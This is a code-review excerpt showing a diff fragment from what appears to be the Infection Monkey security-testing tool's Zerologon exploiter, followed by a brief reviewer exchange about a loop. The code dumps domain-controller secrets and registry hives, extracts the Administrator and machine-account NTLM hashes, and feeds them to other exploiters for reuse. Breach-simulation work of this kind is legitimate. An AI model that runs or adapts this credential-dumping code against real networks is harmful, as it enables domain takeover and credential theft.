monkey/infection_monkey/exploit/zerologon.py

```diff
@@ -0,0 +1,365 @@
+                                                 options=options)
+
+        user = 'Administrator'
+        hashes = ZerologonExploiter._extract_user_hashes_from_secrets(user=user, secrets=dumped_secrets)
+        self.store_extracted_hashes_for_exploitation(user=user, hashes=hashes)
+        return ':'.join(hashes)  # format - "lmhash:nthash"
+
+    def get_dumped_secrets(self, remote_name: str = '', username: str = '', options: Optional[object] = None) -> List[str]:
+        dumper = DumpSecrets(remote_name=remote_name,
+                             username=username,
+                             options=options)
+        dumped_secrets = dumper.dump().split('\n')
+        return dumped_secrets
+
+    @staticmethod
+    def _extract_user_hashes_from_secrets(user: str, secrets: List[str]) -> List[str]:
+        for secret in secrets:
+            if user in secret:
+                # format of secret - "domain\uid:rid:lmhash:nthash:::"
+                hashes = secret.split(':')[2:4]
+                return hashes  # format - [lmhash, nthash]
+
+    def store_extracted_hashes_for_exploitation(self, user: str, hashes: List[str]) -> None:
+        self.add_extracted_creds_to_exploit_info(user, hashes[0], hashes[1])
+        self.add_extracted_creds_to_monkey_config(user, hashes[0], hashes[1])
+
+    def add_extracted_creds_to_exploit_info(self, user: str, lmhash: str, nthash: str) -> None:
+        self.exploit_info['credentials'].update({
+            user: {
+                'username': user,
+                'password': '',
+                'lm_hash': lmhash,
+                'ntlm_hash': nthash
+            }
+        })
+
+    # so other exploiters can use these creds
+    def add_extracted_creds_to_monkey_config(self, user: str, lmhash: str, nthash: str) -> None:
+        if user not in self._config.exploit_user_list:
+            self._config.exploit_user_list.append(user)
+
+        if lmhash not in self._config.exploit_lm_hash_list:
+            self._config.exploit_lm_hash_list.append(lmhash)
+
+        if nthash not in self._config.exploit_ntlm_hash_list:
+            self._config.exploit_ntlm_hash_list.append(nthash)
+
+    def get_original_pwd_nthash(self, admin_pwd_hashes: str) -> str:
+        if not self.save_HKLM_keys_locally(admin_pwd_hashes):
+            return
+
+        options = OptionsForSecretsdump(
+            dc_ip=self.dc_ip,
+            just_dc=False,
+            system=os.path.join(os.path.expanduser('~'), 'monkey-system.save'),
+            sam=os.path.join(os.path.expanduser('~'), 'monkey-sam.save'),
+            security=os.path.join(os.path.expanduser('~'), 'monkey-security.save')
+        )
+
+        dumped_secrets = self.get_dumped_secrets(remote_name='LOCAL',
+                                                 options=options)
+        for secret in dumped_secrets:
+            if '$MACHINE.ACC: ' in secret:  # format of secret - "$MACHINE.ACC: lmhash:nthash"
+                nthash = secret.split(':')[2]
```

Comment:
This for loop seems like a duplication with `_extract_user_hashes_from_secrets`.

Reply:
It's different. The format in which the hashes are dumped is different for both.